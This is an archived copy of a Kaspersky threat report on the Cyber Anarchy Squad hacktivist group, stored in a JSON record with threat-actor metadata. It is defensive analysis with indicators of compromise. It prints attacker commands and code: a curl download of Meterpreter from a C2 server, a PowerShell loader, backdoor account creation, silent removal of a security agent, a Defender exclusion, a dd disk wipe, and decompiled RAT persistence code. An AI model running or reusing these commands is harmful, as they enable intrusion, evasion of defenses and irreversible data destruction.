{
	"id": "28dd511e-8725-4bc9-a88f-ef236d069748",
	"created_at": "2026-04-06T00:19:40.815638Z",
	"updated_at": "2026-04-10T13:13:07.739089Z",
	"deleted_at": null,
	"sha1_hash": "8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e",
	"title": "Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 495007,
	"plain_text": "Analysis of Cyber Anarchy Squad attacks targeting Russian and\r\nBelarusian organizations\r\nBy Kaspersky\r\nPublished: 2024-12-18 · Archived: 2026-04-05 17:18:51 UTC\r\nAbout C.A.S\r\nC.A.S (Cyber Anarchy Squad) is a hacktivist group that has been attacking organizations in Russia and Belarus since 2022.\r\nBesides data theft, its goal is to inflict maximum damage, including reputational. To this end, the group’s attacks exploit\r\nvulnerabilities in publicly available services and make extensive use of free tools.\r\nOur latest investigation unearthed new activity by the group, explored the attack stages, and analyzed the tools and malware\r\nused. In addition, we discovered links between C.A.S and other hacktivist groups, such as the Ukrainian Cyber Alliance and\r\nDARKSTAR.\r\nLike most hacktivist groups, C.A.S uses Telegram as a platform to spread information about victims. We found a channel\r\nthat posts news and messages about the group’s attacks and ideology, as well as a chat hosting a discussion of its activities.\r\nC.A.S on Telegram\r\nNote: this post examines active Telegram channels that we presume to be run by hacktivist groups. Use these sources with\r\ncaution.\r\nTactics\r\nThis section analyzes the attack chain as per the MITRE ATT\u0026CK framework, as well as the tools we found in the current\r\nC.A.S campaign.\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 1 of 15\n\nInitial Access\r\nC.A.S gains initial access to targeted systems by means of the Exploit Public-Facing Application technique (T1190). The\r\nattackers compromise Jira, Confluence and Microsoft SQL Server services using vulnerabilities that we were unable to\r\nidentify due to the data storage limitations of the attacked segment. However, our analysis of the group leader’s messages in\r\nthe C.A.S Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. 
Instead, they\r\nlikely attack vulnerable network resources or gain access to systems after their compromise by third parties.\r\nMessages from the C.A.S leader known as The Way\r\nTranslation:\r\nThe aim of the C.A.S group is to inflict maximum financial and reputational damage on organizations in Russia and Belarus.\r\nIn pursuit of this goal, they likely exploit vulnerabilities not only in Jira, Confluence and MS SQL, but in other publicly\r\navailable services and systems too. What’s more, we are aware of attacks carried out by C.A.S in collaboration with other\r\ngroups, which is another way they gain initial access and move through victims’ infrastructure.\r\nMessage about the group’s methods of gaining initial access\r\nTranslation:\r\nExecution\r\nTo move further through the infrastructure, the threat actors used rare open-source remote access Trojans (RATs), including\r\nRevenge RAT and Spark RAT, which we have not seen in attacks by other hacktivists. These utilities allowed them to\r\nremotely control the infected systems and execute various commands.\r\nIn one incident, we detected the use of a compromised MS SQL service to execute commands in cmd. 
This was indicated by\r\nthe cmd.exe process running as a child process of sqlservr.exe.\r\nThe attackers also used PowerShell to execute scripts:\r\npowershell.exe -ex bypass -f \\\\[DOMAIN]\\netlogon\\rm.ps1\r\nOn top of this, the attackers downloaded the Meterpreter reverse shell for the Metasploit framework from the C2 server to\r\nthe infected host using the cURL tool:\r\n\"$system32\\cmd.exe\",\"\"$system32\\cmd.exe\" /c cd %appdata% \u0026\u0026 dir \u0026\u0026 curl -O\r\nhxxp://185.117.75[.]3:8092/sdc.exe\r\nIn some reverse shell incidents, we also found traces of Revenge RAT (48210CA2408DC76815AD1B7C01C1A21A) being\r\nrun through the PowerShell process:\r\npowershell.exe -WindowStyle Hidden -NoExit -Command\r\n[System.Reflection.Assembly]::LoadFile('C:\\Users\\\u003cusername\u003e\\Downloads\\\r\n\u003cexe_name\u003e.exe').EntryPoint.Invoke($null, @())\r\nPersistence\r\nTo gain persistence in the system, the threat actors created accounts on compromised hosts using the net.exe utility:\r\nC:\\Windows\\system32\\cmd.exe\" /c net user admin cas /add\r\nC:\\Windows\\system32\\cmd.exe\" /c net user admin admin123123123 /add\r\nIt’s worth noting that they used the password cas for the admin account, matching the name of the group.\r\nWe also found samples of Revenge RAT that had gained persistence in the system by adding registry keys to\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.\r\ntry {\r\n    RegistryKey registryKey =\r\nRegistry.LocalMachine.OpenSubKey(\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\r\ntrue);\r\n    try {\r\n        if (!((string)((registryKey != null) ? 
registryKey.GetValue(\"\\\"\" +\r\nPath.GetFileNameWithoutExtension(Program._installName) + \"\\\"\") : null) == text) \u0026\u0026\r\nregistryKey != null) {\r\n            registryKey.SetValue(fileNameWithoutExtension, \"\\\"\" + text + \"\\\"\");\r\n        }\r\n    } catch {\r\n        if (registryKey != null) {\r\n            registryKey.SetValue(fileNameWithoutExtension, \"\\\"\" + text + \"\\\"\");\r\n        }\r\n    }\r\n    if (registryKey != null) {\r\n        registryKey.Dispose();\r\n    }\r\n}\r\ninternal static string _installName = \"rpchost.exe\";\r\nThese Trojan samples were additionally copied to the Startup folder:\r\nFile.Copy(Application.ExecutablePath, \"C:\\\\Users\\\\\" + Environment.UserName +\r\n\"\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\\" +\r\nProgram._installName);\r\ninternal static string _ip = \"194.36.188.94\";\r\ninternal static string _installName = \"svhost.exe\";\r\nDuring execution, one of the above RAT samples (FC3A8EABD07A221B478A4DDD77DDCE43) created a watchdog\r\ntimer file called svxhost.exe in the C:\\Windows\\System32 directory, wrote information to this file, created the NgcMngrSvc\r\nservice with svxhost.exe as an executable file, and ran this service.\r\n[HandleProcessCorruptedStateExceptions]\r\nprivate static void CreateWatchdog() {\r\n    Program.hService = Helper.OpenService(Program.hSCM, \"NgcMngrSvc\", 4);\r\n    if (Program.hService == IntPtr.Zero) {\r\n        try {\r\n            File.WriteAllBytes(Program.system + \"svxhost.exe\",\r\nProgram.GetResource(\"dog\"));\r\n        } catch {\r\n        }\r\n        Program.hService = Helper.CreateService(Program.hSCM, \"NgcMngrSvc\", \"Microsoft\r\nPassport Manager\", 983551, 16, 2, 0, Program.system + \"svxhost.exe\", null, IntPtr.Zero,\r\nnull, null, null);\r\n    }\r\n    Helper.StartService(Program.hService, 0, 
null);\r\n}\r\nDefense Evasion\r\nDuring our incident investigations, we often noted that the attackers gained full control over information security tools\r\nbecause these were not properly configured. To implement effective anti-attack measures, it is vital to perform regular\r\ntesting, updating and integration of security systems. A key factor in securing infrastructure is compliance with password-protection policies for access to the information security systems.\r\nIn one of the incidents, C.A.S managed to disable an EPP agent without a password, using the rm.ps1 script.\r\n$guidQuery = wmic product where \"[redacted]\" get IdentifyingNumber\r\n$guid = $guidQuery | Select-String -Pattern \"{[A-F0-9-]+}\" | ForEach-Object {\r\n$_.Matches[0].Value }\r\nif ($guid -ne $null) {\r\n    $msiexecCommand2 = \"msiexec.exe /x $guid /quiet\"\r\nStart-Process -NoNewWindow -FilePath cmd -ArgumentList \"/c $msiexecCommand2\"\r\n}\r\nThe final command to disable the EPP agent was this:\r\ncmd.exe /c msiexec.exe /x {GUID} /quiet\r\nAlso, as part of the Defense Evasion technique, the attackers use Revenge RAT to add the $windir\\$system32 directory to\r\nthe Windows Defender exclusion list. 
This allows the group to hide its activity, because the RAT itself and its malicious\r\npayload are both installed in this folder.\r\n\"\\\"$windir\\\\$system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -WindowStyle Hidden -\r\nCommand \\\"Add-MpPreference -ExclusionPath '$windir\\\\$system32'\\\"\"\r\nAnd to further reduce the likelihood of detection, the attackers use a malware naming convention that mimics legitimate\r\nWindows processes:\r\nC:\\Windows\\System32\\svxhost.exe\r\nC:\\Windows\\System32\\svrhost.exe\r\nC:\\Windows\\System32\\drivers\\etc\\rpchost.exe\r\nC:\\Windows\\panther\\ssbyt.exe\r\nCredential Access\r\nIn our study of hacktivist groups (Twelve, BlackJack, Head Mare, Crypt Ghouls and others), we often encountered the use of\r\nthe same credential extraction tools, namely XenAllPasswordPro, BrowserThief and Mimikatz. These tools have long been\r\nknown in the community and regularly feature in our crimeware reports.\r\nXenAllPasswordPro extracts passwords from system storages.\r\nBrowserThief compromises browser data, including autofill data and saved accounts.\r\nMimikatz extracts password hashes from Windows RAM.\r\nC.A.S is no exception: we found these tools in their attacks as well. This is yet further proof that hacktivist groups attacking\r\nRussia and Belarus tend to deploy the same arsenal of publicly available utilities.\r\nDiscovery\r\nAt the infrastructure exploration stage, the attackers made active use of various commands to collect information. 
Here’s a\r\nlist of the commands we logged:\r\nCommand Description\r\nnet user Lists all local user accounts (using net.exe)\r\nsysteminfo\r\nDisplays detailed system information, including operating system version, installation date and\r\npatch date, as well as computer model, CPU and memory settings\r\ncmd ver Displays the operating system version\r\nnet localgroup Displays a list of all local groups on the computer (using net.exe)\r\nnet accounts\r\nDisplays user account settings, such as password expiration period, minimum password length\r\nand account lockout conditions (using net.exe)\r\nnet user /domain Displays a list of user accounts in the domain (using net.exe)\r\ncd %appdata% \u0026\u0026\r\nwhoami\r\nNavigates to the %appdata% folder, then displays the name of the user executing this command\r\nThe Revenge RAT samples also ran WMI queries to collect information about the operating system and CPU to be sent to\r\nthe attackers’ command-and-control (C2) server:\r\nSELECT * FROM Win32_OperatingSystem\r\nSELECT UserName FROM Win32_ComputerSystem\r\nSELECT * FROM WIN32_Processor\r\nCommand and Control\r\nTo communicate with the C2 server, C.A.S uses various tools. We saw the use of reverse shells generated by the msfvenom\r\ntool for the Metasploit framework, as well as publicly available RATs.\r\nRevenge RAT\r\nThe attackers first used Revenge RAT to establish a connection to the C2 server, then downloaded and installed the\r\nnecessary payloads of various frameworks; they also collected data about the infected host and sent it to the server.\r\nWe found two similar customized samples of Revenge RAT in the attacks we investigated. 
Below is a full list of functions\r\nfound in these variants:\r\nFC3A8EABD07A221B478A4DDD77DDCE43 48210CA2408DC76815AD1B7C01C1A21A\r\nFilesInFolder FilesInFolder\r\nDrives Drives\r\nCreateFile CreateFile\r\nDeleteFile DeleteFile\r\nMoveFile MoveFile\r\nCopyFile CopyFile\r\nArchiveFile ArchiveFile\r\nUploadFile UploadFile\r\nDownloadFile DownloadFile\r\nShellCommand ShellCommand\r\nUninstall Uninstall\r\nClientModel\r\nDisconnectMsg\r\nPing\r\nText\r\nThe configuration files for these samples are also similar:\r\nFC3A8EABD07A221B478A4DDD77DDCE43 48210CA2408DC76815AD1B7C01C1A21A\r\ninternal static string _ip = \"194.36.188.94\";\r\ninternal static string _installName = \"rpchost.exe\";\r\nprivate static int _port = 1337;\r\ninternal static bool _install = true;\r\ninternal static string _group = \"cci.by2\";\r\ninternal static string _startupMethod = \"hklm\";\r\ninternal static string _installLocation =\r\n\"windir\\\\System32\\\\drivers\\\\etc\\\\\";\r\ninternal static bool _installWatchdog = true;\r\ninternal static bool _usePowershell = false;\r\nprivate static Client _client;\r\ninternal static Process cmd;\r\nprivate static IntPtr hSCM;\r\ninternal static IntPtr hService;\r\nprivate static string system =\r\nEnvironment.GetFolderPath(Environment.SpecialFolder.System)\r\n+ \"\\\\\";\r\ninternal static string _ip =\r\n\"194.36.188.94\";\r\ninternal static string _installName =\r\n\"sysinfo\";\r\nprivate static int _port = 1337;\r\ninternal static bool _install = true;\r\nprivate static Client _tcpClient;\r\ninternal static Process cmd;\r\nSpark RAT\r\nAs mentioned above, the group used another remote access Trojan 
called Spark RAT. Below is its configuration:\r\n{\r\n\"secure\":false,\r\n\"host\":\"185.117.75.3\",\r\n\"port\":9610,\r\n\"path\":\"/\",\r\n\"uuid\":\"3917b41****\",\r\n\"key\":\"aa494c90****\"\r\n}\r\nFrom the IP address specified in the configuration, the attackers downloaded the Meterpreter payload to the victim’s device.\r\nAlongside this, Spark RAT automatically collects and sends the following system information to the C2 server:\r\nTrojan function Description\r\nid Unique device identifier\r\nruntime.GOOS Information about the operating system in which the RAT is running\r\nruntime.GOARCH CPU architecture\r\nlocalIP Local IP address of the device\r\nmacAddr MAC address of the network interface of the device\r\ncpuInfo CPU information\r\nramInfo Amount of RAM\r\nnetInfo General information about network connections\r\ndiskInfo Information about disk drives\r\nuptime System uptime since the last boot\r\nhostname Device name\r\nusername Name of the current user\r\nSpark RAT provides the operator with a wide range of commands to control the target device. These commands allow both\r\nbasic operations (such as PING to check client availability, SHUTDOWN to turn off the device, and RESTART to reboot it)\r\nas well as more complex ones, such as remote file management (FILES_LIST, FILES_FETCH, FILES_UPLOAD), terminal\r\ninteraction (TERMINAL_INIT, TERMINAL_INPUT, TERMINAL_RESIZE) and remote desktop access (DESKTOP_INIT,\r\nDESKTOP_SHOT). Also available to the operator are commands to manage processes (PROCESSES_LIST,\r\nPROCESS_KILL) and execute system commands (COMMAND_EXEC).\r\nMeterpreter\r\nIn one of the incidents, we found a Meterpreter reverse shell (6CBC93B041165D59EA5DED0C5F377171). Using this, the\r\ngroup was able to gain full access to the compromised system and do the following:\r\n1. Remotely manage the file system;\r\n2. 
Intercept network traffic;\r\n3. Log keystrokes;\r\n4. Extract password hashes;\r\n5. Perform pivoting techniques through compromised hosts;\r\n6. Monitor the webcam and microphone.\r\nThe reverse shell contains the following C2 server address and port:\r\nImpact\r\nTo cause damage to victims, the group encrypts their infrastructure. As we’ve noted before in similar hacktivist attacks, the\r\nthreat actors’ arsenal consists of leaked LockBit ransomware builders for Windows systems and Babuk for Linux systems. In\r\nthe majority of C.A.S attacks, encrypted file extensions are generated randomly; but sometimes the number 3119 appears\r\nboth in the name of the executable file of the ransomware Trojan, and in the extensions added to encrypted files. This\r\nnumber often crops up in C.A.S activity — we see it in usernames, ransom notes, encrypted file extensions and group-related merchandise. It is not a random sequence of digits, but represents the positions of the letters C, A, and S in the\r\nalphabet: C is 3, A is 1 and S is 19.\r\nOne of the group’s ransomware samples is named 3119.exe. In our investigation of a C.A.S attack involving this sample, we\r\nfound a ransom note displayed after file encryption in the system:\r\nC.A.S ransom note\r\nBesides encryption, the attackers can destroy data in different segments of the victim’s network or on specific servers. To do\r\nthis, they first collect information about attached drives using the df system utility:\r\nThen, to destroy the data, they use the dd system utility, which executes /dev/zero — a file that generates an endless stream\r\nof null bytes. 
The attackers copy null bytes from /dev/zero to the /dev/[VOLUME] partition of their choice in 4 MB blocks.\r\nThis overwrites the data in the partition with zeros, wiping it forever.\r\ndd if=/dev/zero of=/dev/[VOLUME] bs=4M\r\nThis operation allows the attackers to irreversibly destroy data on the victim’s servers.\r\nOn Telegram, the perpetrators often confirm their destructive impact on victims’ infrastructure. In their posts, they describe\r\nwhat they did and attach screenshots with the results of their operations. Which part of the infrastructure to encrypt and\r\nwhich to destroy immediately is the attackers’ choice: it depends on the situation.\r\nPublic chat message from C.A.S\r\nTranslation:\r\nVictims\r\nC.A.S targets companies from Russia and Belarus in various industries, including government and commercial\r\norganizations, entertainment and technology firms, telecommunications companies and industrial enterprises. This suggests\r\nthat victims are chosen based on their location, regardless of their field of activity.\r\nThe group often writes about its victims on Telegram, posting screenshots of infrastructure, stolen documents and links to\r\ncloud storages or forums offering stolen data for download.\r\nConnections to other groups\r\nAs mentioned above, besides its Telegram channel, C.A.S hosts a public chat where group members and followers actively\r\ncommunicate. 
Interestingly, the chat administrators belong not only to C.A.S, but to related groups; one of them, who goes\r\nby the name of Sean Townsend, is an administrator of the hacktivist group RUH8 and the press secretary of the Ukrainian\r\nCyber Alliance (U.C.A).\r\nC.A.S Discussions chat administrators and the Telegram account of the C.A.S leader The Way\r\nIn its Telegram channel, C.A.S states that it sometimes works with other groups that share its mission to attack organizations\r\nfrom Russia and Belarus. For example, we found posts about joint attacks by C.A.S with U.C.A, RUH8, RM-RF and others:\r\nMessage about a joint attack by C.A.S and U.C.A\r\nMessage about a joint attack by C.A.S, RUH8 and RM-RF\r\nTranslation:\r\nWhile investigating an incident in the infrastructure of one C.A.S victim, we also found traces of compromise pointing to the\r\nDARKSTAR group (also known by the names Shadow and Comet). In one incident, we discovered the following files:\r\nThese findings are further evidence of a connection between groups targeting Russian organizations. As part of their\r\ncollaboration, group members likely share access to victims’ infrastructure, C2 infrastructure and tools. They also exchange\r\ninformation about attacks on Telegram as a way to increase campaign visibility, discredit victims and inflict reputational\r\ndamage.\r\nTakeaways\r\nThe C.A.S group poses a serious threat to organizations in Russia and Belarus. The threat actors attack key industries using\r\nan array of tools and techniques that we have observed in the campaigns of other hacktivist groups. C.A.S attacks utilize rare\r\nRATs, publicly available remote management tools, and a range of vulnerability exploitation methods. 
In addition, the group\r\nspreads information about its attacks through a public Telegram channel, which causes both financial and reputational\r\ndamage to victims. A more detailed analysis of C.A.S attacks is available to our Threat Intelligence subscribers.\r\nThe group openly confirms that it actively collaborates with other attackers targeting Russia. Joint actions and use of a\r\ncommon infrastructure point to the emergence of a sophisticated attack ecosystem, in which hacktivist groups share\r\nresources, tools and access to improve efficiency and scale operations. This strategy not only complicates attribution, but\r\nsignificantly increases the destructive potential of attacks.\r\nTo effectively counter such groups, it is vital to harden system defenses, apply regular updates to cybersecurity tools and\r\nleverage data analytics for monitoring relevant threat activity. It is also critically important to follow best practices when\r\nconfiguring your information security systems. We strongly recommend the following guides:\r\nConfiguring protection for managed applications;\r\nHardening Guide.\r\nFollowing these instructions will minimize the risks of compromise and increase your system’s resistance to possible\r\nattacks.\r\nIndicators of compromise\r\nRevenge RAT\r\nSpark RAT\r\nMeterpreter\r\nFile path\r\nC:\\windows\\System32\\svxhost.exe\r\nC:\\Windows\\system32\\svrhost.exe\r\nC:\\Windows\\System32\\drivers\\etc\\rpchost.exe\r\nC:\\Windows\\panther\\ssbyt.exe\r\nC:\\Users\\[USERNAME]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svhost.exe\r\nIPs\r\n194.36.188[.]94\r\n185.117.75[.]3\r\nSource: https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/"
	],
	"report_names": [
		"114990"
	],
	"threat_actors": [
		{
			"id": "1a9c4f3f-2178-4c83-a9b5-d2135d90520a",
			"created_at": "2024-04-19T02:00:03.623733Z",
			"updated_at": "2026-04-10T02:00:03.615238Z",
			"deleted_at": null,
			"main_name": "BlackJack",
			"aliases": [],
			"source_name": "MISPGALAXY:BlackJack",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4a73cb62-be05-49d2-9dbb-1298606ec0a3",
			"created_at": "2025-03-07T02:00:03.799095Z",
			"updated_at": "2026-04-10T02:00:03.827106Z",
			"deleted_at": null,
			"main_name": "Ukrainian Cyber Alliance",
			"aliases": [
				"UCA"
			],
			"source_name": "MISPGALAXY:Ukrainian Cyber Alliance",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "98cd3bc4-fd41-4087-be03-f6f8f3be7b67",
			"created_at": "2025-05-29T02:00:03.220566Z",
			"updated_at": "2026-04-10T02:00:03.871851Z",
			"deleted_at": null,
			"main_name": "Cyber Alliance",
			"aliases": [],
			"source_name": "MISPGALAXY:Cyber Alliance",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c26ba56b-628e-4610-b167-1610efb08459",
			"created_at": "2024-02-22T02:00:03.77679Z",
			"updated_at": "2026-04-10T02:00:03.594516Z",
			"deleted_at": null,
			"main_name": "Cyber.Anarchy.Squad",
			"aliases": [
				"Cyber Anarchy Squad"
			],
			"source_name": "MISPGALAXY:Cyber.Anarchy.Squad",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "401a4c49-1b76-49ea-8b31-9a8c3c0bd9b9",
			"created_at": "2025-03-18T11:50:08.877355Z",
			"updated_at": "2026-04-10T02:00:03.639241Z",
			"deleted_at": null,
			"main_name": "Head Mare",
			"aliases": [],
			"source_name": "MISPGALAXY:Head Mare",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434780,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e.pdf",
		"text": "https://archive.orkl.eu/8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e.txt",
		"img": "https://archive.orkl.eu/8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e.jpg"
	}
}